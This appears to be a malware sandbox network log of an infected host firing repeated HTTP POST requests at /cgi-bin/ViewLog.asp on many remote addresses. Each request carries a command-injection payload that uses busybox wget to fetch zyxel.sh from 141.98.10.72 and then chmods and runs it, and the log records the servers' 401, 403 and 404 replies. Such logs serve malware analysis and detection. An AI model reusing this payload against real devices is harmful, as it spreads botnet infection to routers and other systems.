                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1051192.168.2.144671495.163.16.1158080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:21.065449953 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:21.293797970 CET410INHTTP/1.1 401 Unauthorized
                                                        Server: nginx/1.10.2
                                                        Date: Wed, 14 Feb 2024 08:35:21 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 195
                                                        Connection: keep-alive
                                                        WWW-Authenticate: Basic realm="closed area"
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>401 Authorization Required</title></head><body bgcolor="white"><center><h1>401 Authorization Required</h1></center><hr><center>nginx/1.10.2</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1052192.168.2.144513485.31.233.2108080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:21.135051966 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:21.276264906 CET970INHTTP/1.1 404
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 774
                                                        Date: Wed, 14 Feb 2024 08:35:21 GMT
                                                        Keep-Alive: timeout=20
                                                        Connection: keep-alive
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 5b 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 5d 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 38 30 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [&#47;cgi-bin&#47;ViewLog.asp] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.80</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1053192.168.2.145485031.136.15.1098080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:21.471503019 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:22.083448887 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:23.331597090 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:25.795284033 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:30.915110111 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:40.898920059 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:01.121965885 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1054192.168.2.145935631.136.241.1888080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:21.471575022 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:22.083446980 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:23.331494093 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:25.795270920 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:30.915086985 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:40.898761988 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:01.121865988 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1055192.168.2.145225295.129.251.198080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:21.485227108 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:21.702646017 CET429INHTTP/1.1 403 Forbidden
                                                        Date: Wed, 14 Feb 2024 08:55:52 GMT
                                                        Server: Apache
                                                        Content-Length: 228
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /cgi-bin/ViewLog.aspon this server.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1056192.168.2.144002694.177.162.2458080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:21.487071991 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:21.705317020 CET460INHTTP/1.1 404 Not Found
                                                        Date: Wed, 14 Feb 2024 08:35:20 GMT
                                                        Server: Apache/2.4.43 (Win64) mod_fcgid/2.3.10-dev OpenSSL/1.1.1f
                                                        Content-Length: 196
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1057192.168.2.143391831.136.130.2158080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:21.490931988 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:22.179467916 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:23.523376942 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:26.307306051 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
